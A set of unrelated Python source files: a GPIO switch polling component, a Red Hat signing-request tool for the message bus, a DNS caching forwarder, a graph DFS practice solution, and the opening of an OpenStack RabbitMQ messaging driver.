"""Get the state of the switch.
:returns: The switch state.
:rtype: int
"""
if self.__pin.state == ON_STATE:
return switch_state.ON
return switch_state.OFF
@property
def is_polling(self):
"""Check to see if the switch is in poll mode."""
return self.__isPolling
def _execute_poll(self):
"""Execute the poll cycle."""
while not self.__stopEvent.is_set():
self.__pin.read()
core_utils.sleep(500)
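        # The loop above re-reads the pin roughly every 500 ms until the stop event is set.
        # The assumption here is that pin.read() causes the underlying raspy Gpio object to
        # emit gpio.EVENT_GPIO_STATE_CHANGED when the value differs, which
        # _on_pin_state_changed then turns into a switch state change event.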
def poll(self):
"""Poll the switch status.
:raises: ObjectDisposedException if this instance has been disposed.
:raises: InvalidOperationException if this switch is attached to a
pin that has not been configured as an input.
"""
if self.is_disposed:
raise ObjectDisposedException("SwitchComponent")
if self.__pin.mode != pin_mode.IN:
msg = "The pin this switch is attached to must be configured"
msg += " as an input."
raise InvalidOperationException(msg)
if self.__isPolling:
return
self.__stopEvent.clear()
self.__isPolling = True
self.__pollThread = threading.Thread(target=self._execute_poll)
self.__pollThread.name = "SwitchComponentPollThread"
self.__pollThread.daemon = True
self.__pollThread.start()
def interrupt_poll(self):
"""Interrupt the poll cycle."""
if not self.__isPolling or self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__isPolling = False
def dispose(self):
"""Release managed resources used by this component."""
if self.is_disposed:
return
self.interrupt_poll()
if self.__pin is not None:
self.__pin.dispose()
self.__pin = None
self.__stopEvent = None
self.__pollThread = None
Switch.dispose(self)
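# Minimal usage sketch (assumes "pin" is an already-constructed raspy GPIO input pin
# object; the variable name is illustrative only):
#
#     switch = SwitchComponent(pin)
#     switch.poll()                 # start the background poll thread
#     print(switch.state)           # switch_state.ON or switch_state.OFF
#     switch.interrupt_poll()
#     switch.dispose()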
|
umb_producer.py
|
#!/usr/bin/env python2
import base64
import json
import logging
import ssl
import subprocess
import sys
import threading
import click
import requests
from rhmsg.activemq.producer import AMQProducer
from rhmsg.activemq.consumer import AMQConsumer
# Expose errors during signing for debugging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
######################################################################
URLS = {
'dev': (
'amqps://messaging-devops-broker03.dev1.ext.devlab.redhat.com:5671',
'amqps://messaging-devops-broker04.dev1.ext.devlab.redhat.com:5671',
),
'qa': (
'amqps://messaging-devops-broker03.web.qa.ext.phx1.redhat.com:5671',
'amqps://messaging-devops-broker04.web.qa.ext.phx1.redhat.com:5671',
),
'stage': (
'amqps://messaging-devops-broker03.web.stage.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.stage.ext.phx2.redhat.com:5671',
),
'prod': (
'amqps://messaging-devops-broker03.web.prod.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.prod.ext.phx2.redhat.com:5671',
),
}
TOPIC = 'VirtualTopic.eng.art.artifact.sign'
# TODO: In the future we need to handle 'rhcos' having '4.1'
# hard-coded into the URL path.
MESSAGE_DIGESTS = {
'openshift': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/clients/{release_stage}/{release_name}/sha256sum.txt',
'rhcos': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/dependencies/rhcos/{release_name_xy}/{release_name}/sha256sum.txt'
}
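# Template placeholders: {arch} is the release architecture, {release_stage} is the client
# type passed on the command line (e.g. 'ocp' or 'ocp-dev-preview'), {release_name} is the
# full version string, and {release_name_xy} is its major.minor prefix used in the RHCOS path.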
DEFAULT_CA_CHAIN = "/etc/pki/ca-trust/source/anchors/RH-IT-Root-CA.crt"
# This is the JSON we send OVER the bus when requesting signatures
SIGN_REQUEST_MESSAGE_FIELDS = [
"artifact",
# Added by ART
"artifact_meta",
"request_id",
"requestor",
"sig_keyname",
]
ART_CONSUMER = 'Consumer.openshift-art-signatory.{env}.VirtualTopic.eng.robosignatory.art.sign'
def get_release_tag(release_name, arch):
"""Determine the quay destination tag where a release image lives, based on the
release name and arch (since we can now have multiple arches for each release name)
    - make sure it includes the arch in the tag to distinguish from any other releases of the same name.
e.g.:
(4.2.0-0.nightly-s390x-2019-12-10-202536, s390x) remains 4.2.0-0.nightly-s390x-2019-12-10-202536
(4.3.0-0.nightly-2019-12-07-121211, x86_64) becomes 4.3.0-0.nightly-2019-12-07-121211-x86_64
"""
return release_name if arch in release_name else "{}-{}".format(release_name, arch)
######################################################################
# Click stuff! Define these here and reuse them later because having
# 'required' options in the global context creates a poor user
# experience. Running "this-script <sub-command> --help" won't work
# until every global required option is provided.
context_settings = dict(help_option_names=['-h', '--help'])
requestor = click.option("--requestor", required=True, metavar="USERID",
help="The user who requested the signature")
product = click.option("--product", required=True,
type=click.Choice(["openshift", "rhcos"]),
help="Which product this signature is for")
request_id = click.option("--request-id", required=True, metavar="BUILDURL",
help="Unique build job identifier for this signing request, "
"use the job URL from Jenkins: $env.BUILD_URL")
sig_keyname = click.option("--sig-keyname", required=True,
type=click.Choice(['test', 'redhatrelease2', 'beta2']),
help="Name of the key to have sign our request")
release_name_opt = click.option("--release-name", required=True, metavar="SEMVER",
help="Numerical name of this release, for example: 4.1.0-rc.10")
arch_opt = click.option("--arch", required=True, metavar="ARCHITECTURE",
type=click.Choice(['x86_64', 'ppc64le', 's390x']),
help="Which architecture this release was built for")
client_type = click.option("--client-type", required=True, metavar="VAL",
type=click.Choice(['ocp', 'ocp-dev-preview']),
help="What type of client needs to be signed")
client_cert = click.option("--client-cert", required=True, metavar="CERT-PATH",
type=click.Path(exists=True),
help="Path to the client certificate for UMB authentication")
client_key = click.option("--client-key", required=True, metavar="KEY-PATH",
type=click.Path(exists=True),
help="Path to the client key for UMB authentication")
env = click.option("--env", required=False, metavar="ENVIRONMENT",
default='stage',
type=click.Choice(['dev', 'stage', 'prod']),
help="Which UMB environment to send to")
noop = click.option("--noop", type=bool, is_flag=True, default=False,
help="If given, DO NOT request signature, "
"show the JSON that WOULD be sent over the bus")
ca_certs = click.option("--ca-certs", type=click.Path(exists=True),
default=DEFAULT_CA_CHAIN,
help="Manually specify the path to the RHIT CA Trust Chain. "
"Default: {}".format(DEFAULT_CA_CHAIN))
digest = click.option("--digest", metavar="DIGEST", help="Pass the digest that should be signed")
# ---------------------------------------------------------------------
@click.group(context_settings=context_settings)
def cli(**kwargs):
"""Helper utility for internal Red Hat use ONLY. Use in a build job to
request signatures for various artifacts produced as part of an
Openshift 4.x release. Signatures are requested by sending a JSON blob
over the Universal Message Bus to the 'robosignatory' (RADAS).
You may override the default path to look for the Red Hat IT
Certificate Authority trust chain by using the --ca-certs option in
the global context (before the sub-command).
"""
pass
######################################################################
# Helpers
def get_digest_base64(location):
"""Download the sha256sum.txt message digest file at the given
`location`.
:return: A `string` of the base64-encoded message digest
"""
res = requests.get(location,
verify=ssl.get_default_verify_paths().openssl_cafile)
if res.status_code == 200:
# b64encode needs a bytes type input, use the dedicated
# 'encode' method to turn str=>bytes. The result of
# `b64encode` is a bytes type. Later when we go to serialize
# this with json it needs to be a str type so we will decode
# the bytes=>str now.
return base64.b64encode(res.text.encode()).decode()
else:
raise(Exception(res.reason))
def presend_validation(message):
"""Verify the message we want to send over the bus has all the
required fields
"""
for field in SIGN_REQUEST_MESSAGE_FIELDS:
if field not in message:
return field
return True
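# Usage sketch: presend_validation returns True when every field listed in
# SIGN_REQUEST_MESSAGE_FIELDS is present, otherwise the name of the first missing field,
# e.g. presend_validation({"artifact": "..."}) would return "artifact_meta".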
def oc_image_info(pullspec):
"""Get metadata for an image at the given `pullspec`
    :return: a dict with the serialized JSON from the 'oc image info'
call
"""
image_info_raw = subprocess.check_output(
['oc', 'image', 'info', '-o', 'json', pullspec])
return json.loads(image_info_raw)
def get_bus_producer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a producer. We're going to
need this in multiple places so we want to ensure we do it the
same way each time.
"""
return AMQProducer(urls=URLS[env or 'stage'],
certificate=certificate,
private_key=private_key,
trusted_certificates=trusted_certificates,
topic=TOPIC)
def producer_thread(producer, args):
print(args)
producer.send_msg(*args)
def producer_send_msg(producer, *args):
t = threading.Thread(target=producer_thread, args=(producer, args))
t.start()
t.join()
def get_bus_consumer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a consumer. We're going to
    need this in multiple places though, so we want to ensure we do it
the same way each time.
"""
return AMQConsumer(urls=URLS[env or 'stage'], certificate=certificate,
private_key=private_key, trusted_certificates=trusted_certificates)
def art_consumer_callback(msg, notsure):
"""`msg` is a `Message` object which has various attributes. Such as `body`.
`notsure` I am not sure what that is. I only got as far as knowing
this callback requires two parameters.
"""
print(msg)
body = json.loads(msg.body)
print(json.dumps(body, indent=4))
if body['msg']['signing_status'] != 'success':
print("ERROR: robosignatory failed to sign artifact")
exit(1)
else:
# example: https://datagrepper.stage.engineering.redhat.com/id?id=2019-0304004b-d1e6-4e03-b28d-cfa1e5f59948&is_raw=true&size=extra-large
result = body['msg']['signed_artifact']
out_file = body['msg']['artifact_meta']['name']
with open(out_file, 'w') as fp:
fp.write(base64.decodestring(result))
fp.flush()
print("Wrote {} to disk".format(body['msg']['artifact_meta']['name']))
return True
def consumer_thread(consumer, env):
    consumer.consume(ART_CONSUMER.format(env=env), art_consumer_callback)
def consumer_start(consumer, env):
    t = threading.Thread(target=consumer_thread, args=(consumer, env))
    t.start()
    return t
def get_producer_consumer(env, certificate, private_key, trusted_certificates):
producer = get_bus_producer(env, certificate, private_key, trusted_certificates)
consumer = get_bus_consumer(env, certificate, private_key, trusted_certificates)
return (producer, consumer)
######################################################################
@cli.command("message-digest", short_help="Sign a sha256sum.txt file")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@arch_opt
@click.pass_context
def message_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, arch):
"""Sign a 'message digest'. These are sha256sum.txt files produced by
the 'sha256sum` command (hence the strange command name). In the ART
world, this is for signing message digests from extracting OpenShift
tools, as well as RHCOS bare-betal message digests.
"""
if product == 'openshift':
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name=release_name,
release_stage=client_type)
elif product == 'rhcos':
release_parts = release_name.split('.')
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name_xy='.'.join(release_parts[:2]),
release_name=release_name)
artifact = get_digest_base64(artifact_url)
message = {
"artifact": artifact,
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": "sha256sum.txt.gpg",
"type": "message-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
        consumer_thread = consumer_start(consumer, env)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
@cli.command("json-digest", short_help="Sign a JSON digest claim")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@digest
@arch_opt
@click.pass_context
def json_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, digest, arch):
"""Sign a 'json digest'. These are JSON blobs that associate a
pullspec with a sha256 digest. In the ART world, this is for "signing
payload images". After the json digest is signed we publish the
signature in a location which follows a specific directory pattern,
thus allowing the signature to be looked up programmatically.
"""
json_claim = {
"critical": {
"image": {
"docker-manifest-digest": None
},
"type": "atomic container signature",
"identity": {
"docker-reference": None,
}
},
"optional": {
"creator": "Red Hat OpenShift Signing Authority 0.0.1",
},
}
release_stage = "ocp-release-nightly" if client_type == 'ocp-dev-preview' else "ocp-release"
release_tag = get_release_tag(release_name, arch)
pullspec = "quay.io/openshift-release-dev/{}:{}".format(release_stage, release_tag)
json_claim['critical']['identity']['docker-reference'] = pullspec
if not digest:
digest = oc_image_info(pullspec)['digest']
json_claim['critical']['image']['docker-manifest-digest'] = digest
print("ARTIFACT to send for signing (WILL BE base64 encoded first):")
print(json.dumps(json_claim, indent=4))
message = {
"artifact": base64.b64encode(json.dumps(json_claim).encode()).decode(),
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": json_claim['critical']['image']['docker-manifest-digest'].replace(':', '='),
"type": "json-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
        consumer_thread = consumer_start(consumer, env)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
if __name__ == '__main__':
cli()
|
doh-cache-fork.py
|
#!/usr/bin/env python3
import asyncio
import types, time
import random, struct
import argparse, logging
import dns.resolver
import dns.message
import socket
import threading
import multiprocessing as mp
import aioprocessing as aiomp
import multiprocessing.managers
# Attempt to use uvloop if installed for extra performance
# try:
# import uvloop
# asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
# except ImportError:
# pass
# Handle command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--listen-address', default='localhost',
help='address to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-p', '--listen-port', type=int, default=53,
help='port to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-u', '--upstreams', nargs='+', default=['1.1.1.1', '1.0.0.1'],
help='upstream servers to forward DNS queries and requests to (default: %(default)s)')
parser.add_argument('-t', '--tcp', action='store_true', default=False,
help='serve TCP based queries and requests along with UDP (default: %(default)s)')
parser.add_argument('-m', '--max-cache-size', type=int, default=10000,
help='maximum size of the cache in dns records (default: %(default)s)')
parser.add_argument('--active', action='store_true', default=False,
help='actively replace expired cache entries by performing upstream requests (default: %(default)s)')
parser.add_argument('--timeout', type=float, default=5.0,
help='time to wait before giving up on a request (default: %(default)s seconds)')
args = parser.parse_args()
host = args.listen_address
port = args.listen_port
upstreams = args.upstreams
cache_size = args.max_cache_size
active = args.active
timeout = args.timeout
# Basic diagram
# Q Q
# listener -> cache {} -> forwarder
# Q Q
# Queue for listener to post requests and get responses
cache_request = aiomp.AioQueue()
cache_response = aiomp.AioQueue()
forwarder_request = aiomp.AioQueue()
forwarder_response = aiomp.AioQueue()
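# Rough sketch of what flows through each queue, inferred from the workers
# below (not an authoritative protocol description):
#   cache_request:      (wire_query_bytes, client_addr)    listener  -> cache
#   cache_response:     (wire_answer_bytes, client_addr)   cache     -> listener
#   forwarder_request:  DnsRequest                         cache     -> forwarder
#   forwarder_response: (DnsRequest, dns.resolver.Answer)  forwarder -> cache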
def main():
# Setup logging
logging.basicConfig(level='INFO', format='[%(levelname)s] %(message)s')
# Setup resolver cache
workers = []
cache = DnsLruCache(cache_size)
wait_table = DnsWaitTable()
# p4 = mp.Process(target=echo_worker, args=(forwarder_request, forwarder_response), daemon=True)
# workers.append(p4)
p = mp.Process(target=cache_worker, args=(cache, wait_table, cache_request, cache_response, forwarder_request, forwarder_response), daemon=True)
workers.append(p)
p = mp.Process(target=forwarder_worker, args=((upstreams[0], 53), timeout, forwarder_request, forwarder_response), daemon=True)
workers.append(p)
# Setup event loop
loop = asyncio.get_event_loop()
# Setup UDP server
logging.info('Starting UDP server listening on: %s#%d' % (host, port))
udp_listen = loop.create_datagram_endpoint(lambda: UdpDnsListen(cache_response, cache_request), local_addr = (host, port))
udp, protocol = loop.run_until_complete(udp_listen)
# Setup TCP server
if args.tcp:
logging.info('Starting TCP server listening on %s#%d' % (host, port))
tcp_listen = loop.create_server(TcpDnsListen, host, port)
tcp = loop.run_until_complete(tcp_listen)
# Serve forever
try:
for worker in workers:
worker.start()
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
pass
# Close listening servers and event loop
udp.close()
if args.tcp:
tcp.close()
loop.close()
class UdpDnsListen(asyncio.DatagramProtocol):
"""
DNS over UDP listener.
"""
def __init__(self, in_queue, out_queue, **kwargs):
self.in_queue = in_queue
self.out_queue = out_queue
super().__init__(**kwargs)
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
asyncio.ensure_future(self.process_packet(data, addr))
def error_received(self, exc):
logging.warning('Minor transport error')
async def process_packet(self, query, addr):
# Post query to cache -> (query, addr)
logging.debug('LISTENER: Cache POST %s' % (addr[0]))
self.out_queue.put((query, addr))
# Get response from cache <- (answer, addr)
answer, addr = await self.in_queue.coro_get()
logging.debug('LISTENER: Cache GET %s' % (addr[0]))
# Send DNS packet to client
self.transport.sendto(answer, addr)
class TcpDnsListen(asyncio.Protocol):
"""
DNS over TCP listener.
"""
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
asyncio.ensure_future(self.process_packet(data))
def eof_received(self):
if self.transport.can_write_eof():
self.transport.write_eof()
def connection_lost(self, exc):
self.transport.close()
async def process_packet(self, data):
pass
class DnsRequest:
"""
DNS request object used for associating responses.
"""
def __init__(self, qname, qtype, qclass):
self.qname = qname
self.qtype = qtype
self.qclass = qclass
class DnsWaitTableEntry:
"""
DNS waiting table entry.
"""
def __init__(self, start, wait_list=None):
self.start = start
self.wait_list = wait_list
if self.wait_list is None:
self.wait_list = []
class DnsWaitTable:
"""
DNS waiting table to store clients waiting on DNS requests.
"""
def __init__(self, lock=None):
self.table = {}
self.lock = lock
if self.lock is None:
self.lock = threading.Lock()
def get(self, key):
return self.table.get(key)
def set(self, key, value):
self.table[key] = value
def delete(self, key):
try:
del self.table[key]
except KeyError:
pass
class DnsLruCacheNode:
"""
DNS LRU cache entry.
"""
def __init__(self, key, value):
self.key = key
self.value = value
self.prev = self
self.next = self
def link_before(self, node):
self.prev = node.prev
self.next = node
node.prev.next = self
node.prev = self
def link_after(self, node):
self.prev = node
self.next = node.next
node.next.prev = self
node.next = self
def unlink(self):
self.next.prev = self.prev
self.prev.next = self.next
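# Usage sketch for DnsLruCacheNode, as used by DnsLruCache below: the cache
# keeps a circular doubly-linked list anchored at a sentinel node. The most
# recently used entry sits right after the sentinel and the least recently
# used entry right before it, so eviction pops `sentinel.prev`.
#
#   sentinel = DnsLruCacheNode(None, None)
#   node = DnsLruCacheNode('example.com.', 'answer')
#   node.link_after(sentinel)   # mark as most recently used
#   node.unlink()               # drop it from the LRU ordering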
class DnsLruCache:
"""
    DNS LRU cache to store recently processed lookups.
"""
def __init__(self, size=100000):
self.data = {}
self.sentinel = DnsLruCacheNode(None, None)
self.hits = 0
self.misses = 0
self.size = size
if self.size < 1:
self.size = 1
def get(self, key):
"""
Returns value associated with key.
"""
# Attempt to lookup data
node = self.data.get(key)
if node is None:
self.misses += 1
return None
# Unlink because we're either going to move the node to the front
# of the LRU list or we're going to free it.
node.unlink()
# Check if data is expired
if node.value.expiration <= time.time():
del self.data[node.key]
return None
node.link_after(self.sentinel)
# Return data with updated ttl
response = node.value.response
ttl = int(node.value.expiration - time.time())
for section in (response.answer, response.authority, response.additional):
for rr in section:
rr.ttl = ttl
self.hits += 1
return node.value
def put(self, key, value):
"""
Associate key and value in the cache.
"""
node = self.data.get(key)
# Remove previous entry in this position
if node is not None:
node.unlink()
del self.data[node.key]
# Clean out least used entries if necessary
while len(self.data) >= self.size:
node = self.sentinel.prev
node.unlink()
del self.data[node.key]
# Add entry to cache
node = DnsLruCacheNode(key, value)
node.link_after(self.sentinel)
self.data[key] = node
def flush(self, key=None):
"""
Flush the cache of entries.
"""
# Flush only key if given
if key is not None:
node = self.data.get(key)
if node is not None:
node.unlink()
del self.data[node.key]
else:
node = self.sentinel.next
# Remove references to all entry nodes
while node != self.sentinel:
next = node.next
node.prev = None
node.next = None
node = next
# Reset cache
self.data = {}
self.hits = 0
self.misses = 0
def ratio(self):
"""
Return cache hit ratio since creation or last full flush.
"""
if (self.hits + self.misses) > 0:
return self.hits / (self.hits + self.misses)
else:
return 0
def expired(self, timeout):
"""
Returns list of expired or almost expired cache entries.
"""
expired = []
for k, v in self.data.items():
if v.value.expiration <= time.time() + timeout:
expired.append(k)
return expired
################################################################################
def cache_worker(cache, wait_table, in_queue, out_queue, next_in, next_out):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.ensure_future(cache_async_read(cache, wait_table, in_queue, out_queue, next_in))
asyncio.ensure_future(cache_async_write(cache, wait_table, out_queue, next_out))
if active:
# threading.Thread(target=active_cache, args=(cache, 10, next_in), daemon=True).start()
asyncio.ensure_future(active_cache_async(cache, 10, next_in))
loop.run_forever()
async def cache_async_read(cache, wait_table, in_queue, out_queue, next_in):
while True:
# Get query from client <- (query, addr)
query, addr = await in_queue.coro_get()
request = dns.message.from_wire(query)
id = request.id
request = request.question[0]
request = DnsRequest(request.name, request.rdtype, request.rdclass)
logging.debug('CACHE: Client GET %s' % (request.qname))
# Answer query from cache if possible
response = cache.get((request.qname, request.qtype, request.qclass))
if response is not None:
response.response.id = id
answer = response.response.to_wire()
# Post response to client -> (answer, addr)
logging.debug('CACHE: Client POST %s' % (request.qname))
out_queue.put((answer, addr))
continue
# Add client to wait list for this query
entry = wait_table.get((request.qname, request.qtype, request.qclass))
# Create new wait list for this query and submit request
if entry is None:
entry = DnsWaitTableEntry(time.time(), [(addr, id)])
wait_table.set((request.qname, request.qtype, request.qclass), entry)
# Post query to forwarder -> (request)
logging.debug('CACHE: Forwarder POST %s' % (request.qname))
next_in.put(request)
# Request is pending so add client to wait list
else:
# # Query has expired so reset wait list
# if (entry.start + timeout) <= time.time():
# raise KeyError
            # Check if client is already waiting
            wait_list = entry.wait_list
            for i, waiting in enumerate(wait_list):
                # Use ID of latest request from this client
                if waiting[0] == addr:
                    wait_list[i] = (addr, id)
                    break
            else:
                # Client is not yet waiting, so add it to the wait list
                wait_list.append((addr, id))
async def cache_async_write(cache, wait_table, out_queue, next_out):
while True:
# Get response from the forwarder <- (request, response)
request, response = await next_out.coro_get()
logging.debug('CACHE: Forwarder GET %s' % (request.qname))
# Add entry to cache
cache.put((request.qname, request.qtype, request.qclass), response)
# Reply to clients waiting for this query
entry = wait_table.get((request.qname, request.qtype, request.qclass))
# No clients are waiting on this query
if entry is None:
continue
# Clients are waiting so create and send replies
reply_list = entry.wait_list
for (addr, id) in reply_list:
# Prepare answer to query
response.response.id = id
answer = response.response.to_wire()
# Post response to client -> (answer, addr)
out_queue.put((answer, addr))
logging.debug('CACHE: Client POST %s' % (request.qname))
# Remove wait list for this query
wait_table.delete((request.qname, request.qtype, request.qclass))
async def active_cache_async(cache, period, out_queue):
"""
Worker to process cache entries and preemptively replace expired or almost expired entries.
Params:
cache - cache object to store data in for quick retrieval (synchronized)
period - time to wait between cache scans (in seconds)
out_queue - queue object to send requests for further processing (synchronized)
"""
while True:
expired = cache.expired(period)
for key in expired:
request = DnsRequest(*key)
out_queue.put(request)
if len(expired) > 0:
logging.info('CACHE: Updated %d/%d entries' % (len(expired), len(cache.data)))
logging.info('CACHE: Hits %d, Misses %d, Ratio %.2f' % (cache.hits, cache.misses, cache.ratio()))
await asyncio.sleep(period)
################################################################################
################################################################################
class UdpDnsForward(asyncio.DatagramProtocol):
"""
DNS over UDP forwarder.
"""
def __init__(self, out_queue):
self.out_queue = out_queue
super().__init__()
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
asyncio.ensure_future(self.process_packet(data))
async def process_packet(self, answer):
answer = dns.message.from_wire(answer)
request = DnsRequest(answer.question[0].name, answer.question[0].rdtype, answer.question[0].rdclass)
response = dns.resolver.Answer(request.qname, request.qtype, request.qclass, answer, False)
logging.debug('FORWARDER: Cache POST %s' % (request.qname))
self.out_queue.put((request, response))
def forwarder_worker(upstream, timeout, in_queue, out_queue):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
# Connect to remote server
udp_forward = loop.create_datagram_endpoint(lambda: UdpDnsForward(out_queue), remote_addr=upstream)
transport, protocol = loop.run_until_complete(udp_forward)
asyncio.ensure_future(forwarder_async(transport, in_queue))
loop.run_forever()
async def forwarder_async(transport, in_queue):
while True:
request = await in_queue.coro_get()
logging.debug('FORWARDER: Cache GET %s' % (request.qname))
query = dns.message.make_query(request.qname, request.qtype, request.qclass)
query = query.to_wire()
transport.sendto(query)
################################################################################
async def forwarder_async2(sock, timeout, in_queue, out_queue):
while True:
request = await in_queue.coro_get()
logging.debug('forwarder: Cache GET %s' % (request.qname))
query = dns.message.make_query(request.qname, request.qtype, request.qclass)
query = query.to_wire()
answer, rtt = await udp_request(sock, query, timeout)
if answer == b'':
response = None
else:
answer = dns.message.from_wire(answer)
response = dns.resolver.Answer(request.qname, request.qtype, request.qclass, answer, False)
await out_queue.coro_put((request, response))
logging.debug('forwarder: Cache POST %s' % (request.qname))
if __name__ == '__main__':
main()
|
kingdom_monkeys.py
|
"""
Codemonk link: https://www.hackerearth.com/practice/algorithms/graphs/depth-first-search/practice-problems/algorithm/kingdom-of-monkeys/
This is the story in Zimbo, the kingdom officially made for monkeys. Our Code Monk visited Zimbo and declared open a
challenge in the kingdom, thus spoke to all the monkeys: You all have to make teams and go on a hunt for Bananas. The
team that returns with the highest number of Bananas will be rewarded with as many gold coins as the number of Bananas
with them. May the force be with you! Given there are N monkeys in the kingdom. Each monkey who wants to team up with
another monkey has to perform a ritual. Given total M rituals are performed. Each ritual teams up two monkeys. If
Monkeys A and B teamed up and Monkeys B and C teamed up, then Monkeys A and C are also in the same team. You are given
an array A where Ai is the number of bananas i'th monkey gathers. Find out the number of gold coins that our Monk should
set aside for the prize.
Input - Output:
First line contains an integer T. T test cases follow.
First line of each test case contains two space-separated N and
M. M lines follow. Each of the M lines contains two integers Xi and Yi,
the indexes of monkeys that perform the i'th ritual.
Last line of the testcase contains N space-separated integer constituting the array A.
Print the answer to each test case in a new line.
Sample input:
1
4 3
1 2
2 3
3 1
1 2 3 5
Sample Output:
6
"""
"""
We find each connected component with DFS and, while traversing it, sum the bananas collected by all the monkeys in
that group. The answer is the largest such sum over all groups, i.e. the number of bananas gathered by the best team.
Final complexity: O(NODES+EDGES)
"""
import sys
from sys import stdin, stdout
import threading
threading.stack_size(200000000)
sys.setrecursionlimit(10**6)
def dfs(graph, begin, visited, bananas):
amount = bananas[begin-1]
visited.add(begin)
for node in graph[begin-1]:
if node == -1:
continue
if node not in visited:
amount += dfs(graph, node, visited, bananas)
return amount
def main():
inp_len = int(stdin.readline())
for _ in range(inp_len):
n, m = map(int, stdin.readline().split())
graph = [[-1] for _ in range(n)]
for _ in range(m):
x, y = map(int, stdin.readline().split())
if graph[x-1][0] == -1:
graph[x-1][0] = y
else:
graph[x-1].append(y)
if graph[y-1][0] == -1:
graph[y-1][0] = x
else:
graph[y-1].append(x)
bananas = list(map(int, stdin.readline().split()))
visited = set()
max_bananas = -1
for i in range(len(graph)):
if i+1 not in visited:
max_bananas = max(dfs(graph, i+1, visited, bananas), max_bananas)
stdout.write(str(max_bananas) + "\n")
thread = threading.Thread(target=main)
thread.start()
|
impl_rabbit.py
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import errno
import functools
import itertools
import math
import os
import random
import socket
import ssl
import sys
import threading
import time
from urllib import parse
import uuid
from amqp import exceptions as amqp_exec
import kombu
import kombu.connection
import kombu.entity
import kombu.messaging
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import eventletutils
from oslo_utils import importutils
import oslo_messaging
from oslo_messaging._drivers import amqp as rpc_amqp
from oslo_messaging._drivers import amqpdriver
from oslo_messaging._drivers import base
from oslo_messaging._drivers import common as rpc_common
from oslo_messaging._drivers import pool
from oslo_messaging import _utils
from oslo_messaging import exceptions
eventlet = importutils.try_import('eventlet')
if eventlet and eventletutils.is_monkey_patched("thread"):
# Here we initialize module with the native python threading module
# if it was already monkey patched by eventlet/greenlet.
stdlib_threading = eventlet.patcher.original('threading')
else:
    # Manage the case where we run this driver in a non-patched environment
    # and where the user nevertheless configures the driver to run the
    # heartbeat through a python thread; if we don't do that, then when the
    # heartbeat starts we will face an issue by trying to override the
    # threading module.
stdlib_threading = threading
# NOTE(sileht): don't exist in py2 socket module
TCP_USER_TIMEOUT = 18
rabbit_opts = [
cfg.BoolOpt('ssl',
default=False,
deprecated_name='rabbit_use_ssl',
help='Connect over SSL.'),
cfg.StrOpt('ssl_version',
default='',
deprecated_name='kombu_ssl_version',
help='SSL version to use (valid only if SSL enabled). '
'Valid values are TLSv1 and SSLv23. SSLv2, SSLv3, '
'TLSv1_1, and TLSv1_2 may be available on some '
'distributions.'
),
cfg.StrOpt('ssl_key_file',
default='',
deprecated_name='kombu_ssl_keyfile',
help='SSL key file (valid only if SSL enabled).'),
cfg.StrOpt('ssl_cert_file',
default='',
deprecated_name='kombu_ssl_certfile',
help='SSL cert file (valid only if SSL enabled).'),
cfg.StrOpt('ssl_ca_file',
default='',
deprecated_name='kombu_ssl_ca_certs',
help='SSL certification authority file '
'(valid only if SSL enabled).'),
cfg.BoolOpt('heartbeat_in_pthread',
default=True,
